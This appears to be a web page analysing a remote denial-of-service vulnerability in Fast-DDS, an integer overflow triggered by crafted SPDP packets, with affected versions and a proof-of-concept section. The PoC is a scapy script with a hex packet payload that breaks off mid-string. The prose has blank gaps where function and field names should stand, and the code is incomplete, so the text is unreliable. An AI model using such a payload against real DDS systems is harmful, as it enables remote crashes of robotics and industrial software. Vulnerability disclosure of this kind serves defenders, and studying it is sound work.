Fast-DDS Integer Overflow Remote DoS Vulnerability Analysis

Vulnerability Overview This is a remote denial-of-service (DoS) vulnerability located within Fast-DDS. Trigger Condition: Occurs when DDS Security mode is enabled. Attack Vector: An attacker can construct malicious SPDP packets to tamper with the DATA Submessage (specifically the or fields). Vulnerability Mechanism: An integer overflow vulnerability exists within the function. During the execution of the check , the multiplication operation may overflow because is a 32-bit integer, leading to an incorrect comparison result (i.e., the check is bypassed). Consequence: Subsequently, the code executes , attempting to allocate a massive amount of memory (e.g., ). This triggers an Out-of-Memory (OOM) condition, ultimately causing the Fast-DDS process to terminate remotely. Affected Versions The following Fast-DDS versions are affected: <= 3.4.0 2.6.11 2.14.6 3.2.4 3.3.1 3.4.1 PoC Code 1. Vulnerable Code Snippet 2. PoC Packet and Script ```python from scapy.all import * payload = bytes.fromhex( "52 50 53 62 02 01 0f eb ba 10 1f 26 a3 08" "9f 45 19 27 00 01 00 00 ab 14 43 00 00 02 04 30" "15 07 03 03 00 00 10 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "7f 26 03 03 0f 46 19 17 ff 01 01 02 c2 00 00 00" "01 00 00 00 01 00 00 00 00 03 00 00 00 00 00 00" "02 03 00 00 00 00 00 04 00 01 00 00 50 00 10 00" "00 00 10 3f 17 26 a3 08 0f 00 19 1f 27 00 00 01" "22 00 11 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 ac 12 50 79 31 00 00 00 00 00 00 00" "00 10 00 00 00 55 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 31 00 10 00 00 00 00 00 00 00 50 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" "00 00 00 00 00 00 00 00 00 00 00 0

Goal Reached Thanks to every supporter — we hit 100%!

Fast-DDS Integer Overflow Remote DoS Vulnerability Analysis

More from this source